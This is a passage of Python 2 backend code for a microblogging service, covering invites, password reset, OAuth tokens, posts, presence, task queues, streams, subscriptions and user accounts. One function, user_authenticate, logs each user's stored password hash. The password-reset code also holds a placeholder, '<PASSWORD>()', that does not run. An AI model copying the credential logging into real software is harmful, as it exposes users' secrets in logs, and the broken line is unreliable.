invite_ref = invite_get(ROOT, code)
for_actor = invite_ref.for_actor
# XXX begin transaction
if util.is_channel_nick(for_actor):
channel_join(ROOT, nick, for_actor)
else:
actor_add_contact(ROOT, nick, for_actor)
actor_add_contact(ROOT, for_actor, nick)
invite_ref.delete()
# XXX end transaction
def invite_get(api_user, code):
key_name = Invite.key_from(code=code)
invite_ref = Invite.get_by_key_name(key_name)
if not invite_ref:
raise exception.ApiException(0x00, "Invalid invite code")
return invite_ref
@owner_required
def invite_reject(api_user, nick, code):
invite_ref = invite_get(ROOT, code)
invite_ref.delete()
@throttled(minute=50, hour=200, day=300, month=500)
@owner_required
def invite_request_email(api_user, nick, email):
"""Create an invitation for the actor, and handle notification.
PARAMETERS:
nick - the usual
email - Email address for new user
RETURNS: Reference to the added invite
"""
validate.email(email)
# TODO(termie): check to make sure this user doesn't already
# exist and the invite doesn't
# if either do we'll do something different
code = util.generate_uuid()
from_actor_ref = actor_get(api_user, nick)
invite_ref = Invite(
code=code,
email=email,
from_actor=from_actor_ref.nick,
for_actor=from_actor_ref.nick,
# to_actor omitted, we are inviting an email address not an actor
)
invite_ref.put()
subject, message, html_message = mail.email_invite(from_actor_ref,
invite_ref.code)
email_send(ROOT, email, subject, message, html_message=html_message)
return invite_ref
#######
#######
#######
@throttled(minute=10, hour=20, day=50)
def login_forgot(api_user, nick_or_email):
# This call should be made when the user is not logged in, so pass ROOT for
# api_user to all subsequent calls.
if patterns.EMAIL_COMPILED.match(nick_or_email):
# This is an email address.
# Does it map to a user? (confirmed email)
actor_ref = actor_lookup_email(ROOT, nick_or_email)
# Is it an unconfirmed email, and does it map to exactly one user?
if not actor_ref:
activations = activation_get_by_email(ROOT, nick_or_email)
if not activations:
raise exception.ApiException(
0x00, 'Email does not match any accounts')
if len(activations) != 1:
raise exception.ApiException(
0x00, 'Email matches more than one account')
actor_ref = actor_get(ROOT, activations[0].actor)
else:
actor_ref = actor_get(ROOT, nick_or_email)
# Get the user's email. First, has it been confirmed?
email = email_get_actor(ROOT, actor_ref.nick)
if not email:
# Do they have any unconfirmed emails?
activation_refs = activation_get_actor_email(ROOT, actor_ref.nick)
if not activation_refs:
raise exception.ApiException(
0x00, 'This user does not have an email address!')
elif len(activation_refs) != 1:
raise exception.ApiException(
0x00, 'This email address maps to multiple users!')
# At this point, we have an unconfirmed email address which maps to exactly
# one user.
email = activation_refs[0].content
# Add a 'please reset this password' item to the DB.
activiation_ref = activation_create(ROOT, actor_ref.nick, 'password_lost',
email)
# The code itself is boring.
code = util.hash_generic(activiation_ref.code)
# Inform the user about their thoughtlessness.
(subject, message, html_message) = mail.email_lost_password(actor_ref, email, code)
mail.send(email, subject, message, html_message=html_message)
def login_reset(api_user, email, hash):
actor_ref = actor_lookup_email(ROOT, email)
# Is it an unconfirmed email, and does it map to exactly one user?
if not actor_ref:
activations = activation_get_by_email(ROOT, email)
if not activations:
raise exception.ApiException(
0x00, 'Email does not match any accounts')
if len(activations) != 1:
raise exception.ApiException(
0x00, 'Email matches more than one account')
actor_ref = actor_get(ROOT, activations[0].actor)
if not actor_ref:
raise exception.ApiException(
0x00, 'This email alias doesn\'t match a user.')
activation_ref = activation_get(ROOT, actor_ref.nick, 'password_lost', email)
# The user didn't lose their password
if not activation_ref:
raise exception.ApiException(0x00, 'Invalid request')
# The hash doesn't match
if util.hash_generic(activation_ref.code) != hash:
raise exception.ApiException(0x00, 'Invalid request, hash does not match')
# Generate a new password
password = <PASSWORD>()
# Update our records
password_hash = util.hash_password(actor_ref.nick, password)
actor_ref.password = password_hash
actor_ref.put()
return password, actor_ref.nick
#######
#######
#######
@admin_required
def mobile_associate(api_user, nick, mobile):
actor_ref = actor_get(api_user, nick)
# XXX start transaction
if actor_lookup_mobile(api_user, mobile):
raise exception.ApiException(0x00, 'Mobile number already in use')
# clear old mobile numbers
# TODO(termie): support multiple mobile numners
old_query = Relation.gql('WHERE owner = :1 AND relation = :2',
actor_ref.nick,
'mobile')
for rel_ref in old_query:
rel_ref.delete()
relation_ref = Relation(
owner=actor_ref.nick,
relation='mobile',
target=mobile,
)
relation_ref.put()
# XXX end transaction
return relation_ref
@admin_required
def mobile_confirm_doubleoptin(api_user, nick):
actor_ref = actor_get(api_user, nick)
if actor_ref.extra.get('sms_double_opt_in', None):
del actor_ref.extra['sms_double_opt_in']
actor_ref.put()
return actor_ref
@admin_required
def mobile_disassociate(api_user, nick, mobile):
actor_ref = actor_get(ROOT, nick)
key_name = Relation.key_from(relation='mobile',
owner=nick,
target=mobile)
rel_ref = Relation.get_by_key_name(key_name)
rel_ref.delete()
return
@owner_required
def mobile_get_actor(api_user, nick):
nick = clean.nick(nick)
query = Relation.gql('WHERE owner = :1 AND relation = :2',
nick,
'mobile')
rel_ref = query.get()
if rel_ref:
return rel_ref.target
return None
#######
#######
#######
def oauth_authorize_request_token(api_user, key, actor, perms="read"):
# TODO validate perms
# TODO privacy
token_ref = oauth_get_request_token(api_user, key)
token_ref.authorized = 1
token_ref.actor = actor
token_ref.perms = perms
token_ref.put()
@admin_required
def oauth_generate_access_token(api_user, consumer_key, request_token_key):
consumer_ref = oauth_get_consumer(api_user, consumer_key)
if not consumer_ref:
raise Exception("bad consumer")
request_token_ref = oauth_get_request_token(ROOT, request_token_key)
if not request_token_ref.authorized:
raise Exception("unauthorized token")
params = {"key_": util.generate_uuid(),
"secret": util.generate_uuid(),
"consumer": consumer_ref.key_,
"actor": request_token_ref.actor,
"perms": request_token_ref.perms,
}
token_ref = OAuthAccessToken(**params)
token_ref.put()
return token_ref
@admin_required
def oauth_get_root_consumer_access_token(api_user, nick):
query = OAuthAccessToken.gql('WHERE actor = :1 AND consumer = :2',
nick, settings.ROOT_CONSUMER_KEY)
existing = query.get()
if existing:
return existing
params = {"key_": util.generate_uuid(),
"secret": util.generate_uuid(),
"consumer": settings.ROOT_CONSUMER_KEY,
"actor": nick,
"perms": "write",
}
token_ref = OAuthAccessToken(**params)
token_ref.put()
return token_ref
@owner_required
def oauth_generate_consumer(api_user, nick):
nick = clean.nick(nick)
# TODO(termie): not doing anything fancy yet, all keys are the same types
# TODO(termie): validation
# not too many keys
key_ = util.generate_uuid()
params = {'key_': key_,
'secret': util.generate_uuid(),
'actor': nick,
'status': 'active',
'type': 'desktop',
'commercial': 0,
}
token_ref = OAuthConsumer(**params)
token_ref.put()
return token_ref
@owner_required
def oauth_consumer_delete(api_user, nick, consumer_key):
"""Removes the oauth consumer key"""
consumer_ref = oauth_get_consumer(api_user, consumer_key)
if not consumer_ref:
raise Exception("bad consumer")
consumer_ref.delete()
@owner_required
def oauth_consumer_update(api_user, nick, consumer_key, app_name,
consumer_type='desktop'):
consumer_type = clean.oauth_type(consumer_type)
consumer_ref = oauth_get_consumer(api_user, consumer_key)
if not consumer_ref:
raise Exception("bad consumer")
consumer_ref.app_name = app_name
consumer_ref.type = consumer_type
consumer_ref.put()
return consumer_ref
@admin_required
def oauth_generate_request_token(api_user, consumer_key):
consumer_ref = oauth_get_consumer(api_user, consumer_key)
if not consumer_ref:
raise Exception("bad consumer")
params = {"key_": util.generate_uuid(),
"secret": util.generate_uuid(),
"consumer": consumer_ref.key_,
"authorized": 0,
}
token_ref = OAuthRequestToken(**params)
token_ref.put()
return token_ref
def oauth_revoke_access_token(api_user, key):
# ROOT for now, we're checking access a little down the line here
token_ref = oauth_get_access_token(ROOT, key)
if not token_ref:
raise exception.ApiException(0x00, "Token does not exist")
# Verify that this token belongs to the specified user.
if token_ref.actor != api_user.nick:
raise exception.ApiException(0x00, "Token does not belong to actor")
token_ref.delete()
@admin_required
def oauth_get_access_token(api_user, key):
key_name = OAuthAccessToken.key_from(key_=key)
return OAuthAccessToken.get_by_key_name(key_name)
@owner_required
def oauth_get_actor_consumers(api_user, nick):
nick = clean.nick(nick)
query = OAuthConsumer.gql('WHERE actor = :1 ORDER BY created_at', nick)
return list(query.run())
@owner_required
def oauth_get_actor_tokens(api_user, nick):
nick = clean.nick(nick)
query = OAuthAccessToken.gql(
'WHERE actor = :1 ORDER BY created_at', nick)
return list(query.run())
# TODO(termie): owner_required_by_consumer_key ?
def oauth_get_consumer(api_user, key):
key_name = OAuthConsumer.key_from(key_=key)
key_ref = OAuthConsumer.get_by_key_name(key_name)
if not key_ref:
return None
actor_ref = actor_get(ROOT, key_ref.actor)
if not actor_owns_actor(api_user, actor_ref):
raise exception.ApiException(exception.PRIVACY_ERROR,
'Only allowed to view your own API keys')
return key_ref
@admin_required
def oauth_get_request_token(api_user, key):
key_name = OAuthRequestToken.key_from(key_=key)
return OAuthRequestToken.get_by_key_name(key_name)
#######
#######
#######
@write_required
@owner_required
def post(api_user, _task_ref=None, **kw):
""" Post a new entry
This will attempt to infer if you are attempting to post to a
channel (prefixing the message with #channel)
PARAMS:
* message - the title of your entry
* location - free form location for this entry
* icon - the web icon for this icon
* nick - the actor posting this entry
* uuid - a unique identifier for this entry
RETURNS: entry_ref
"""
# grab the params we're interested in
message = kw.get('message', '').strip()
location = kw.get('location', '')
icon = clean.icon(kw.get('icon', 0))
generated = kw.get('generated', 0)
uuid = kw.get('uuid', util.generate_uuid())
nick = clean.nick(kw.get('nick', ''))
extra = {}
# Thumbnails are not yet shown on the site but are supported by the mobile
# client.
thumbnail_url = kw.get('thumbnail_url', None)
if thumbnail_url:
extra['thumbnail_url'] = clean.url(thumbnail_url)
channel_post_match = channel_post_re.search(message)
if channel_post_match:
match_dict = channel_post_match.groupdict()
channel = match_dict['channel']
message = match_dict['message']
new_kw = kw.copy()
new_kw['channel'] = channel
new_kw['message'] = message
new_kw['extra'] = extra
return channel_post(api_user, **new_kw)
if len(message) > MAX_POST_LENGTH:
message = message[:MAX_POST_LENGTH]
try:
validate.length(message, 1, MAX_POST_LENGTH)
validate.location(location)
validate.uuid(uuid)
except exception.ValidationError, e:
raise exception.ApiException(0x00, e.user_message)
if generated:
# TODO(termie): update the presence, yo
# update presence only
return
if settings.QUEUE_ENABLED:
task_ref = _task_ref
if not task_ref:
kw['uuid'] = uuid
task_ref = task_get_or_create(api_user,
nick,
'post',
uuid,
kw=kw)
# we've decided this is a presence update
stream_ref = stream_get_presence(api_user, nick)
actor_ref = actor_get(api_user, nick)
extra['title'] = message
extra['location'] = location
extra['icon'] = icon
values = {
'stream': stream_ref.key().name(),
'uuid': uuid,
'owner': stream_ref.owner,
'actor': actor_ref.nick,
'extra': extra
}
if settings.QUEUE_ENABLED:
try:
entry_ref = _process_new_entry_with_progress(
task_ref, actor_ref, stream_ref, values)
except exception.ApiException:
# Something is wrong, bail out and delete the task
task_ref.delete()
raise
else:
# XXX start transaction
#presence = _set_presence(**values)
entry_ref = _add_entry(stream_ref, new_values=values)
subscribers = _subscribers_for_entry(stream_ref, entry_ref)
inboxes = _add_inboxes_for_entry(subscribers, stream_ref, entry_ref)
_notify_subscribers_for_entry(subscribers,
actor_ref,
stream_ref,
entry_ref)
# XXX end transaction
return entry_ref
#######
#######
#######
@public_owner_or_contact
def presence_get(api_user, nick, at_time = None):
"""returns the presence for the given actor if the current can view"""
nick = clean.nick(nick)
if not at_time:
# Get current presence
key_name = 'presence/%s/current' % nick
presence = Presence.get_by_key_name(key_name)
if not presence:
# We did not always create presence from posts
presence_stream = stream_get_presence(api_user, nick)
latest_post = StreamEntry.gql(
'WHERE stream = :1 ORDER BY created_at DESC',
presence_stream.key().name()).get()
if latest_post:
presence = Presence(actor=nick,
uuid=latest_post.uuid,
updated_at=latest_post.created_at,
extra={'presenceline': {
'description': latest_post.extra['title'],
'since': latest_post.created_at}})
else:
presence = Presence.gql(
u"WHERE actor = :1 AND updated_at <= :2 ORDER BY updated_at DESC",
nick, at_time).get()
return ResultWrapper(presence, presence=presence)
def presence_get_actors(api_user, nicks):
"""returns the presence for the nicks given"""
o = {}
nicks = list(set(nicks))
if not nicks:
return o
for nick in nicks:
try:
presence = presence_get(api_user, nick)
except exception.ApiException:
presence = None
o[nick] = presence
return ResultWrapper(o, actors=o)
@owner_required
def presence_get_contacts(api_user, nick, since_time=None, limit=200):
"""returns the presence for the given actor's contacts"""
nick = clean.nick(nick)
limit = clean.limit(limit, 200)
if since_time:
since_time = clean.datetime(since_time)
o = []
# This isn't really general-purpose as it will limit us to as many contacts
# as can be fetched in one go.
# TODO(mikie): make this api paged.
# The reason we still want it is that the mobile client wants as much
# presence as possible but can't handle more than 200 contacts anyway.
contacts = actor_get_contacts(api_user, nick, limit=limit)
contacts.append(nick)
presences = presence_get_actors(api_user, contacts)
for nick, presence in presences.items():
if presence:
if not since_time or presence.updated_at > since_time:
actor_ref = actor_get(api_user, nick)
presence.extra['given_name'] = actor_ref.extra.get('given_name', '')
presence.extra['family_name'] = actor_ref.extra.get('family_name', '')
o.append(presence)
return ResultWrapper(o, contacts=o)
@throttled(minute=30, hour=1200, day=4000, month=20000)
@write_required
@owner_required
def presence_set(api_user, nick, **kw):
"""Presence has three timestamp-like fields:
updated_at is the moment we got the data and can be used to pull 'changed
since' presence based on a timestamp the caller has previously received.
uuid is the identifier for this set of data. It can be used to distinguish
between data you've already seen from new data even if updated_at is close to
propagation delay.
senders_timestamp (in extra) is the time the data was created in the
originating system. It should be used for deciding or displaying freshness.
"""
nick = clean.nick(nick)
updated_at = utcnow()
uuid = kw.pop('uuid', util.generate_uuid())
previous_presence = presence_get(api_user, nick)
extra = {}
if previous_presence:
extra = previous_presence.extra
extra.update(kw)
validate.user_nick(nick)
validate.presence_extra(extra)
params = {'actor': nick,
'updated_at': updated_at,
'uuid': uuid,
'extra': extra,
'key_name': 'presence/%s/current' % nick}
presence = Presence(**params)
presence.put()
# TODO(tyler): Clean this so an API call doesn't fill the DB.
params['key_name'] = 'presence/%s/history/%s' % (nick, updated_at)
presence_history = Presence(**params)
presence_history.put()
return ResultWrapper(presence, presence=presence)
#######
#######
#######
@owner_required
def task_create(api_user, nick, action, action_id, args=None, kw=None,
progress=None, expire=None):
if args is None:
args = []
if kw is None:
kw = {}
if expire:
expire = utcnow() + datetime.timedelta(seconds=expire)
key_name = Task.key_from(actor=nick, action=action, action_id=action_id)
task_ref = Task(actor=nick,
action=action,
action_id=action_id,
expire=expire,
args=args,
kw=kw,
progress=progress
)
task_ref.put()
return task_ref
@owner_required
def task_get(api_user, nick, action, action_id, expire=DEFAULT_TASK_EXPIRE):
""" attempts to acquire a lock on a queue item for (default) 10 seconds """
key_name = Task.key_from(actor=nick, action=action, action_id=action_id)
def _attempt_lock(key, expire):
qi = db.get(key)
now = utcnow()
if qi.expire and qi.expire > now:
raise exception.ApiLocked("Lock could not be acquired: %s" % key_name)
qi.expire = now + datetime.timedelta(seconds=expire)
qi.put()
# TODO(termie): this could probably be a Key.from_path action
q = Task.get_by_key_name(key_name)
if not q:
raise exception.ApiNotFound(
'Could not find task: %s %s %s' % (nick, action, action_id))
try:
db.run_in_transaction(_attempt_lock, q.key(), expire)
return Task.get_by_key_name(key_name)
except db.TransactionFailedError:
exception.log_exception()
raise exception.ApiLocked("Lock could not be acquired: %s" % key_name)
return q
@owner_required
def task_get_or_create(api_user, nick, action, action_id, args=None,
kw=None, progress=None, expire=DEFAULT_TASK_EXPIRE):
try:
task_ref = task_get(api_user, nick, action, action_id, expire)
except exception.ApiNotFound:
task_ref = task_create(api_user, nick, action, action_id, args, kw, progress, expire=expire)
return task_ref
#@throttled(minute=30, hour=1200, day=4000, month=20000)
@owner_required
def task_process_actor(api_user, nick):
""" pop a task off the queue and process it """
nick = clean.nick(nick)
# TODO(termie): we can't do where expire < now AND order by created_at,
# so this means we are a bit more likely to have locked
# entries to sort through
query = Task.gql('WHERE actor = :1 ORDER BY created_at', nick)
# grab a task that is unlocked
task_ref = None
task_more = False
for fake_task_ref in query:
# if we already have one and we're still going then there are more to go
if task_ref:
task_more = True
break
try:
task_ref = task_get(api_user,
nick,
fake_task_ref.action,
fake_task_ref.action_id)
break
except exception.ApiLocked:
continue
except exception.ApiNotFound:
continue
if not task_ref:
raise exception.ApiNoTasks('No tasks for actor: %s' % nick)
logging.info("Processing task: %s %s %s p=%s",
task_ref.actor,
task_ref.action,
task_ref.action_id,
task_ref.progress
)
method_ref = PublicApi.get_method(task_ref.action)
rv = method_ref(api_user, _task_ref = task_ref, *task_ref.args, **task_ref.kw)
# if we don't already know that there are more, do another check after
# processing the item
if not task_more:
query = Task.gql('WHERE expire < :1', utcnow())
t_ref = query.fetch(1)
if t_ref:
task_more = True
return task_more
@admin_required
def task_process_any(api_user):
""" pop a task off the queue and process it """
# TODO(termie): we can't do where expire < now AND order by created_at,
# so this means we are a bit more likely to have locked
# entries to sort through
query = Task.gql('ORDER BY created_at')
# grab a task that is unlocked
task_ref = None
task_more = False
for fake_task_ref in query:
# if we already have one and we're still going then there are more to go
if task_ref:
task_more = True
break
try:
task_ref = task_get(api_user,
fake_task_ref.actor,
fake_task_ref.action,
fake_task_ref.action_id)
except exception.ApiLocked:
continue
except exception.ApiNotFound:
continue
if not task_ref:
raise exception.ApiNoTasks('No tasks')
logging.info("Processing task: %s %s %s p=%s",
task_ref.actor,
task_ref.action,
task_ref.action_id,
task_ref.progress
)
actor_ref = actor_get(ROOT, task_ref.actor)
method_ref = PublicApi.get_method(task_ref.action)
rv = method_ref(actor_ref,
_task_ref = task_ref,
*task_ref.args,
**task_ref.kw)
# if we don't already know that there are more, do another check after
# processing the item
if not task_more:
query = Task.gql('WHERE expire < :1', utcnow())
t_ref = query.fetch(1)
if t_ref:
task_more = True
return task_more
@owner_required
def task_remove(api_user, nick, action, action_id):
""" attempts to acquire a lock on a queue item for (default) 10 seconds """
key_name = Task.key_from(actor=nick, action=action, action_id=action_id)
q = Task.get_by_key_name(key_name)
if not q:
raise exception.ApiNotFound(
'Could not find task: %s %s %s' % (nick, action, action_id))
q.delete()
return True
@owner_required
def task_update(api_user, nick, action, action_id, progress=None, unlock=True):
""" update the progress for a task and possibly unlock it """
key_name = Task.key_from(actor=nick, action=action, action_id=action_id)
q = Task.get_by_key_name(key_name)
if not q:
raise exception.ApiNotFound(
'Could not find task: %s %s %s' % (nick, action, action_id))
q.progress = progress
if unlock:
q.expire = None
q.put()
return q
#######
#######
#######
# TODO(termie): STUB
@admin_required
def sms_receive(api_user, **kw):
pass
@admin_required
def sms_send(api_user, on_behalf, mobile, message):
# TODO(termie): do filtering, throttling, and whatnot based on on_behalf
sms_connection = sms.SmsConnection()
sms_connection.send_message([mobile], message)
#######
#######
#######
@owner_required
def settings_change_notify(api_user, nick, **kw):
actor_ref = actor_get(api_user, nick)
# Convert to boolean
email_notifications = kw.get('email', False) and True
actor_ref.extra['email_notify'] = email_notifications
im_notifications = kw.get('im', False) and True
actor_ref.extra['im_notify'] = im_notifications
sms_notifications = kw.get('sms', False) and True
actor_ref.extra['sms_notify'] = sms_notifications
actor_ref.put()
return actor_ref
@owner_required
def settings_change_password(api_user, nick, new_password):
validate.password(new_password)
actor_ref = actor_get(api_user, nick)
actor_ref.password = util.hash_password(actor_ref.nick, new_password)
actor_ref.put()
return actor_ref
@throttled(minute=2, hour=5, day=10)
@owner_required
def settings_change_privacy(api_user, nick, privacy):
privacy = int(privacy)
# XXX start transaction
actor_ref = actor_get(api_user, nick)
actor_ref.privacy = privacy
actor_ref.put()
# update all the related streams and subscriptions
streams = stream_get_actor(api_user, nick)
for s in streams:
if s.type != 'comments':
s.read = privacy
s.put()
# XXX end transaction
@owner_required
def settings_hide_comments(api_user, hide_comments, nick):
actor_ref = actor_get(api_user, nick)
actor_ref.extra['comments_hide'] = hide_comments == '1'
actor_ref.put()
# TODO(tyler): It seems odd to return actor_ref from these functions...
return actor_ref
@owner_required
def settings_update_account(api_user, nick, **kw):
# note: the only thing we care about at this point is full_name
params = {'given_name': kw.get('given_name', kw.get('first_name', '')),
'family_name': kw.get('family_name', kw.get('last_name', ''))}
validate.name(params['given_name'], "Your First Name", 'given_name')
validate.name(params['family_name'], "Your Last Name", 'family_name')
actor_ref = actor_get(api_user, nick)
actor_ref.extra.update(params)
actor_ref.put()
return actor_ref
#TODO
@owner_required
def settings_update_email(api_user, nick, email):
pass
#######
#######
#######
@throttled(minute=3, hour=20, day=30, month=40)
@write_required
@owner_required
def stream_create(api_user, **kw):
# TODO make sure user is allowed to do this
# TODO make sure this stream doesn't already exist
# TODO(mikie): inherit privacy from actor?
# TODO(tyler): Safety-check kw (so it doesn't blindly pass to extra)
params = {"owner": kw.get('owner'),
'title': kw.get('title', ''),
'type': kw.get('type', 'presence'),
'read': kw.get('read', PRIVACY_PUBLIC),
'write': kw.get('write', PRIVACY_PRIVATE),
'extra': kw.get('extra', {}),
'slug': kw.get('slug', util.generate_uuid())
}
stream_ref = Stream(**params)
stream_ref.put()
return stream_ref
@write_required
@owner_required
def stream_create_comment(api_user, nick):
""" create a default comments stream for the supplied actor """
actor_ref = actor_get(api_user, nick)
comments_params = {"owner": actor_ref.nick,
"title": "comments",
"type": "comment",
"slug": "comments",
"read": PRIVACY_PRIVATE,
"write": PRIVACY_PRIVATE,
"extra": {},
"slug": "comments",
}
comments_stream_ref = stream_create(api_user, **comments_params)
return comments_stream_ref
@write_required
@owner_required
def stream_create_presence(api_user, nick, read_privacy=PRIVACY_PUBLIC,
write_privacy=PRIVACY_PRIVATE):
actor_ref = actor_get(api_user, nick)
presence_params = {"owner": actor_ref.nick,
"title": "presence",
"type": "presence",
"slug": "presence",
"read": read_privacy,
"write": write_privacy,
"extra": {},
"slug": "presence",
}
presence_stream_ref = stream_create(api_user, **presence_params)
return presence_stream_ref
@public_owner_or_contact_by_stream
def stream_get(api_user, stream):
stream_ref = Stream.get_by_key_name(stream)
not_found_message = 'Stream not found: %s' % stream
if not stream_ref:
raise exception.ApiNotFound(not_found_message)
if stream_ref.is_deleted():
raise exception.ApiDeleted(not_found_message)
try:
# ensure the stream owner exists
actor_get(api_user, stream_ref.owner)
except exception.ApiDeleted:
raise exception.ApiDeleted(not_found_message)
except exception.ApiNotFound:
raise exception.ApiNotFound(not_found_message)
return stream_ref
@public_owner_or_contact
def stream_get_actor(api_user, nick):
query = Stream.gql('WHERE owner = :1', nick)
return list(query.run())
@public_owner_or_contact
def stream_get_comment(api_user, nick):
""" stream/nick/comments """
nick = clean.nick(nick)
key_name = Stream.key_from(owner=nick, slug='comments')
comment_stream = Stream.get_by_key_name(key_name)
if not comment_stream:
raise exception.ApiException(0x00, 'Stream not found')
return comment_stream
@public_owner_or_contact
def stream_get_presence(api_user, nick):
""" Queries the Stream entities to find the Stream corresponding to
api_user's presence stream.
The returned value should be the "stream/<nick>/presence" stream.
"""
nick = clean.nick(nick)
key_name = Stream.key_from(owner=nick, slug='presence')
presence_stream = Stream.get_by_key_name(key_name)
if not presence_stream:
raise exception.ApiException(0x00, 'Stream not found')
return presence_stream
# depends on stream_get's privacy
def stream_get_streams(api_user, streams):
o = {}
if not streams:
return o
streams = list(set(streams))
for stream in streams:
stream_ref = stream_get_safe(api_user, stream)
if stream_ref:
o[stream] = stream_ref
return o
def stream_get_safe(api_user, stream):
"""stream_get that returns None on privacy exceptions"""
try:
stream_ref = stream_get(api_user, stream)
except exception.ApiException:
return None
return stream_ref
def stream_is_private(api_user, stream):
stream_ref = stream_get(ROOT, stream)
if stream_ref.read < PRIVACY_PUBLIC:
return True
return False
#######
#######
#######
@owner_required_by_target
def subscription_exists(api_user, topic, target):
key_name = Subscription.key_from(topic=topic, target=target)
sub_ref = Subscription.get_by_key_name(key_name)
if not sub_ref:
return False
return True
@owner_required_by_target
def subscription_get(api_user, topic, target):
key_name = Subscription.key_from(topic=topic, target=target)
sub_ref = Subscription.get_by_key_name(key_name)
return sub_ref
@admin_required
def subscription_get_topic(api_user, topic, limit=100, offset=None):
""" returns the subscriptions for the given topic (usually a stream)
"""
# TODO(termie): this will mean when paging that people with lower nicknames
# tend to receive things first, I'd prefer to order by
# created_at but that will take a couple mods in other places
query = Subscription.Query().order('target').filter('topic =', topic)
if offset is not None:
query.filter('target >', offset)
return query.fetch(limit)
@owner_required_by_target
def subscription_is_active(api_user, topic, target):
key_name = Subscription.key_from(topic=topic, target=target)
sub_ref = Subscription.get_by_key_name(key_name)
if not sub_ref:
return False
# if the stream is contacts-only check the state
if stream_is_private(ROOT, topic) and sub_ref.state != "subscribed":
return False
return True
@delete_required
@owner_required_by_target
def subscription_remove(api_user, topic, target):
key_name = Subscription.key_from(topic=topic, target=target)
sub_ref = Subscription.get_by_key_name(key_name)
if not sub_ref:
return
sub_ref.delete()
return sub_ref
@throttled(minute=50, hour=200, day=1000, month=2000)
@write_required
@owner_required_by_target
def subscription_request(api_user, topic, target):
target_nick = util.get_user_from_topic(target)
topic_nick = util.get_user_from_topic(topic)
if topic_nick is None:
raise exception.ApiException(0, 'Subscription topic must include username')
target_ref = actor_get(api_user, target_nick)
topic_ref = actor_get(api_user, topic_nick)
# TODO(termie): We'd also like to support blocking subscription requests
# and should probably make a state similar to 'rejected',
# though, XEP-0060 sect 4.2. doesn't have a 'rejected' state
# so returning one might confuse pub-sub folk
if actor_can_view_actor(target_ref, topic_ref):
state = 'subscribed'
else:
state = 'pending'
# TODO(termie) send an error back and set 'unconfigured' state appropriately
# if the subscription already exists we probably don't have to do anything
existing_ref = subscription_get(api_user, topic, target)
if existing_ref:
# if they were in a pending state but are for some reason now
# allowed to complete the subscripton upgrade, but don't downgrade
# if the reverse is true as the subscripton may have been confirmed
# by the topic's actor
if existing_ref.state == 'pending' and state == 'subscribed':
existing_ref.state = state
existing_ref.put()
return existing_ref
sub_ref = Subscription(topic=topic,
subscriber=target_ref.nick,
target=target,
state=state,
)
sub_ref.put()
return sub_ref
#TODO
def subscription_set_notify(api_user, topic, nick, target, notify):
""" changes the notification settings for a given subscription """
pass
#######
#######
#######
@admin_required
def user_cleanup(api_user, nick):
""" attempts to fx any users that have been left in an unstable state
"""
actor_ref = actor_get(api_user, nick)
if not actor_ref.normalized_nick:
actor_ref.normalized_nick = actor_ref.nick.lower()
actor_ref.put()
try:
presence_stream_ref = stream_get_presence(api_user, actor_ref.nick)
except exception.ApiException:
stream_create_presence(api_user,
actor_ref.nick,
read_privacy=actor_ref.privacy)
try:
comment_stream_ref = stream_get_comment(api_user, actor_ref.nick)
except exception.ApiException:
stream_create_comment(api_user, actor_ref.nick)
@admin_required
def user_create(api_user, **kw):
nick = kw.get('nick')
nick = clean.nick(nick)
params = {
'nick': nick,
'normalized_nick': nick.lower(),
'privacy': kw.get('privacy', PRIVACY_PUBLIC),
'type': 'user',
'password': kw.get('password', ''),
'extra': {
'given_name': kw.get('given_name', kw.get('first_name', '')),
'family_name': kw.get('family_name', kw.get('last_name', '')),
'sms_double_opt_in': True,
},
}
# validate
validate.not_banned_name(params['nick'])
validate.privacy(params['privacy'])
validate.password(params['password'])
validate.name(params['extra']['given_name'], "Your First Name", 'given_name')
validate.name(params['extra']['family_name'], "Your Last Name", 'family_name')
params['password'] = util.hash_password(params['nick'], params['password'])
try:
existing_ref = actor_lookup_nick(ROOT, nick)
except exception.ApiDeleted:
existing_ref = True
except exception.ApiException:
existing_ref = False
if existing_ref:
raise exception.ValidationError(
'Screen name %s is already in use.' % util.display_nick(nick))
# Create the user
actor = Actor(**params)
actor.put()
# Create the streams
presence_stream = stream_create_presence(api_user,
actor.nick,
read_privacy=params['privacy'])
comments_stream = stream_create_comment(api_user, actor.nick)
# Add the contact
rel = actor_add_contact(actor, actor.nick, ROOT.nick)
return actor
@admin_required
def user_authenticate(api_user, nick, nonce, digest):
actor_ref = actor_get(api_user, nick)
logging.info("nonce %s digest %s password %s"%(nonce, digest,
actor_ref.password))
if digest == util.sha1(nonce + actor_ref.password):
return oauth_get_root_consumer_access_token(api_user, nick)
elif (settings.MANAGE_PY and
digest == util.sha1(nonce + util.sha1(actor_ref.password))):
return oauth_get_root_consumer_access_token(api_user, nick)
else:
return PrimitiveResultWrapper(False)
#######
#######
#######
# Helper class
class PublicApi(object):
methods = {"post": post,
"actor_add_contact": actor_add_contact,
"actor_get": actor_get,
"actor_get_contacts_avatars_since":
actor_get_contacts_avatars_since,
"entry_add_comment": entry_add_comment,
"entry_get_actor_overview": entry_get_actor_overview,
"entry_get_actor_overview_since": entry_get_actor_overview_since,
}
# Private methods are externally accessible but whose design has not been
# finalized yet and may change in the future.
private_methods = {"entry_add_comment_with_entry_uuid":
entry_add_comment_with_entry_uuid,
"entry_get_comments_with_entry_uuid":
entry_get_comments_with_entry_uuid,
"keyvalue_put": keyvalue_put,
"keyvalue_get": keyvalue_get,
"keyvalue_prefix_list": keyvalue_prefix_list,
"presence_get": presence_get,
"presence_set": presence_set,
"presence_get_contacts": presence_get_contacts,
}
root_methods = {"user_authenticate": user_authenticate,
"task_process_actor": task_process_actor
}
@classmethod
def get_method(cls, name, api_user=None):
if api_user and api_user.nick == ROOT.nick and name in cls.root_methods:
return cls.root_methods[name]
if name in cls.methods:
return cls.methods[name]
if name in cls.private_methods:
return cls.private_methods[name]
return None
class ResultWrapper(object):
def __init__(self, raw, **kw):
self.__dict__['raw'] = raw
self.__dict__['kw'] = kw
def __getattr__(self, attr):
return getattr(self.raw, attr)
def __setattr__(self, attr, value):
return setattr(self.raw, attr, value)
def __nonzero__(self):
return bool(self.raw)
def __len__(self):
return len(self.raw)
def to_api(self):
o = {}
for k, v in self.kw.iteritems():
if v is None:
o[k] = {}
else:
o[k] = models._to_api(v)
return o
def __eq__(self, other):
# support comparing to other ResultWrappers
if isinstance(other, self.__class__):
return self.raw == other.raw
else:
return self.raw == other
def __cmp__(self, other):
# support comparing to other ResultWrappers
if isinstance(other, self.__class__):
return self.raw.__cmp__(other.raw)
else:
return self.raw.__cmp__(other)
class PrimitiveResultWrapper(object):
""" ResultWrapper to be used by boolean responses """
def __init__(self, primitive):
self.value = primitive
def to_api(self):
